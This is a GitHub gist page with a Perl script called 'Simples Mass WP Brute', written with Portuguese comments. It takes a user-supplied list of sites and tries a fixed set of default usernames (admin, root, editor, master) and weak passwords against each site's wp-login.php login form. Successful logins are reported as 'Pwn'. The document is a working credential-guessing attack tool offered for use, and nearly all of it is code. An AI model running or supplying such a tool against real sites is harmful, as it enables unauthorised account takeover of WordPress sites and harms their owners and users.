Last active
October 15, 2017 20:33
-
-
Save v4p0r/164529019167a10bf64eaa7444825c7b to your computer and use it in GitHub Desktop.
forget the world
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl | |
# Simples Mass WP Brute | |
# Coder by v4p0r | |
# Date: 15 OUT 2017 18:22 | |
# Greetz: YC - HighTech - EOF Club - Cater - Strike - d3z3n0v3 - all friends | |
# modúlos usado | |
use strict; | |
use LWP::UserAgent; | |
print "Simples Mass WP Brute\n". | |
"Criado por v4p0r\n\n"; | |
# Declarando umas váriveis | |
my ($site, @splitar); | |
print "[Insira sua lista]: "; | |
chomp(my $file = <STDIN>); | |
open (my $sitesone ,'<', $file); | |
my @sites = <$sitesone>; | |
# Definindo user e pass padrões wp, podendo ser alterado | |
my @users = ("admin", "root", "editor","master"); | |
my @password = ("admin", "root", "master", "admin123", "123", "123456789", "editor123"); | |
# Abrindo arquivos para splitar | |
foreach $site (@sites) { | |
foreach my $user (@users) { | |
foreach my $pass (@password) { | |
push @splitar, "$site |$user|$pass"; | |
} | |
} | |
} | |
# Loop / Split and Check | |
foreach my $splitar1 (@splitar) { | |
my ($site,$usuario,$senha) = split/[|]/,$splitar1; | |
if ($site !~ /^http:\/\//) { | |
$site = "http://" . $site; | |
} else { | |
$site = "https://" . $site; | |
} | |
if ($site !~ /\/wp-login.php/) { | |
$site = $site . "/wp-login.php"; | |
} | |
my $useragent = new LWP::UserAgent; | |
my $resposta = $useragent->post($site, | |
{ log => $usuario, | |
pwd => $senha, | |
'wp-submit' => "Log in", | |
}); | |
my $cracked = $resposta->code; | |
print "[+] Testando => Site: " .$site. " User: " .$usuario. " Senha: " .$senha. "\n"; | |
if($cracked == 302){ | |
print "\n[*] Pwn: " .$site. " | " .$usuario. " | " .$senha. "\n\n"; | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment